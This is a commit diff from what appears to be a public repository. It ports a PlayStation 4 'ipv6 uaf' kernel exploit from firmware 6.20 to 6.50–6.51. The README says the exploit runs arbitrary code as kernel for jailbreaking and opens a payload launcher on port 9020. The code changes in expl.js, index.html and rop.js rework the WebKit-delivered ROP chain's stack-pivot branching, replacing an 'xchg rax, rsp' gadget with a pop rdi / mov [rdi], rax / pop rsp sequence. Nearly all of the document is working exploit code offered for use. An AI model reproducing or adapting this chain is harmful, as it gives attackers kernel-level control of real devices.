port to 6.50 - 6.51

- update gadgets
- update branching method
- update kpayload

README.md

@@ -1,7 +1,7 @@
-# PS4 6.20 Kernel Exploit
+# PS4 6.50 - 6.51 Kernel Exploit
 ---
 ## Summary
-In this project you will find a full implementation of the "ipv6 uaf" kernel exploit for the PlayStation 4 on 6.20. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. will launch the usual payload launcher (on port 9020).
+In this project you will find a full implementation of the "ipv6 uaf" kernel exploit for the PlayStation 4 on 6.50 - 6.51. It will allow you to run arbitrary code as kernel, to allow jailbreaking and kernel-level modifications to the system. will launch the usual payload launcher (on port 9020).
 
 This bug was originally discovered by [Fire30](https://twitter.com/fire30), and subsequently found by [Andy Nguyen](https://twitter.com/theflow0/)
 
@@ -22,4 +22,5 @@ The following patches are applied to the kernel:
 - [Specter](https://twitter.com/SpecterDev) - advice + [5.05 webkit](https://github.com/Cryptogenic/PS4-5.05-Kernel-Exploit/blob/master/expl.js) and [(6.20) rop execution method](https://github.com/Cryptogenic/PS4-6.20-WebKit-Code-Execution-Exploit)
 - [kiwidog](https://twitter.com/kd_tech_) - advice
 - [Fire30](https://twitter.com/fire30) - [bad_hoist](https://github.com/Fire30/bad_hoist)
-- [Andy Nguyen](https://twitter.com/theflow0/) - [disclosed exploit code](https://hackerone.com/reports/826026)
+- [Andy Nguyen](https://twitter.com/theflow0/) - [disclosed exploit code](https://hackerone.com/reports/826026)
+- [SocraticBliss](https://twitter.com/SocraticBliss) - Shakespeare dev & crash test dummy

expl.js

@@ -340,4 +340,5 @@ var prim = {
 };
 
 window.primitives = prim;
-if (window.postExpl) window.postExpl();
+
+postExploit();

index.html

@@ -1,7 +1,7 @@
 <!DOCTYPE html>
 <html>
 <head style="background-color:#050505;">
-  <title>PS4Brew 6.20</title>
+  <title>PS4Brew 6.50 - 6.51</title>
   <meta name="viewport" content="width=device-width, initial-scale=1">
   <style>
     .loader {
@@ -55,21 +55,7 @@
   </style>
 </head>
 <body style="margin:0;background-color:#050505;">
-  <script>
-    window.didload = 0;
-    window.didpost = 0;
-
-    window.onload = function () {
-      window.didload = 1;
-      if (window.didpost == 1)
-        setTimeout(window.stage2, 1500);
-    }
-    window.postExpl = function () {
-      window.didpost = 1;
-      if (window.didload == 1)
-        setTimeout(window.stage2, 1500);
-    }
-
+<script>
     function allset() {
       document.getElementById("loader").style.display = "none";
       document.getElementById("awaiting").style.display = "none";
@@ -80,13 +66,7 @@
       document.getElementById("loader").style.display = "none";
       document.getElementById("awaiting").style.display = "block";
     }
-
-    function fail(info) {
-      document.getElementById("loader").style.display = "none";
-      document.getElementById("fail").style.display = "block";
-    }
-  </script>
-
+</script>
   <div id="loader" class="loader"></div>
 
   <div id="awaiting" class="info" style="display:none;">
@@ -102,13 +82,13 @@
   </div>
 
   <div id="badfw" class="info" style="display:none;">
-    Only firmware 6.20 is supported!
+    Only firmware 6.50 - 6.51 is supported!
   </div>
 
   <script src="./rop.js"></script>
   <script src="./syscalls.js"></script>
-  <script src="./expl.js"></script>
   <script src="./userland.js"></script>
+  <script src="./expl.js"></script>
   <pre id="console"></pre>
 </body>
 </html>

rop.js

@@ -157,7 +157,14 @@ window.rop = function () {
     this.push(branch_addr_spc);
     this.push(window.gadgets["add rax, rdx"]);
     this.push(window.gadgets["mov rax, [rax]"]);
-    this.push(window.gadgets["xchg rax, rsp"]);
+    this.push(window.gadgets["pop rdi"]);
+    var a  = this.pushSymbolic();
+    this.push(window.gadgets["mov [rdi], rax"]);
+    this.push(window.gadgets["pop rsp"]);
+    var b = this.get_rsp();
+    this.push(0x41414141);
+
+    this.finalizeSymbolic(a, b);
 
     return branch_addr_spc;
 
@@ -179,7 +186,14 @@ window.rop = function () {
     this.push(branch_addr_spc);
     this.push(window.gadgets["add rax, rdx"]);
     this.push(window.gadgets["mov rax, [rax]"]);
-    this.push(window.gadgets["xchg rax, rsp"]);
+    this.push(window.gadgets["pop rdi"]);
+    var a  = this.pushSymbolic();
+    this.push(window.gadgets["mov [rdi], rax"]);
+    this.push(window.gadgets["pop rsp"]);
+    var b = this.get_rsp();
+    this.push(0x41414141);
+
+    this.finalizeSymbolic(a, b);
 
     return branch_addr_spc;
   }
@@ -200,7 +214,14 @@ window.rop = function () {
     this.push(branch_addr_spc);
     this.push(window.gadgets["add rax, rdx"]);
     this.push(window.gadgets["mov rax, [rax]"]);
-    this.push(window.gadgets["xchg rax, rsp"]);
+    this.push(window.gadgets["pop rdi"]);
+    var a  = this.pushSymbolic();
+    this.push(window.gadgets["mov [rdi], rax"]);
+    this.push(window.gadgets["pop rsp"]);
+    var b = this.get_rsp();
+    this.push(0x41414141);
+
+    this.finalizeSymbolic(a, b);
 
     return branch_addr_spc;
   }
@@ -221,7 +242,14 @@ window.rop = function () {
     this.push(branch_addr_spc);
     this.push(window.gadgets["add rax, rdx"]);
     this.push(window.gadgets["mov rax, [rax]"]);
-    this.push(window.gadgets["xchg rax, rsp"]);
+    this.push(window.gadgets["pop rdi"]);
+    var a  = this.pushSymbolic();
+    this.push(window.gadgets["mov [rdi], rax"]);
+    this.push(window.gadgets["pop rsp"]);
+    var b = this.get_rsp();
+    this.push(0x41414141);
+
+    this.finalizeSymbolic(a, b);
 
     return branch_addr_spc;
   }
@@ -242,7 +270,14 @@ window.rop = function () {
     this.push(branch_addr_spc);
     this.push(window.gadgets["add rax, rdx"]);
     this.push(window.gadgets["mov rax, [rax]"]);
-    this.push(window.gadgets["xchg rax, rsp"]);
+    this.push(window.gadgets["pop rdi"]);
+    var a  = this.pushSymbolic();
+    this.push(window.gadgets["mov [rdi], rax"]);
+    this.push(window.gadgets["pop rsp"]);
+    var b = this.get_rsp();
+    this.push(0x41414141);
+
+    this.finalizeSymbolic(a, b);
 
     return branch_addr_spc;
   }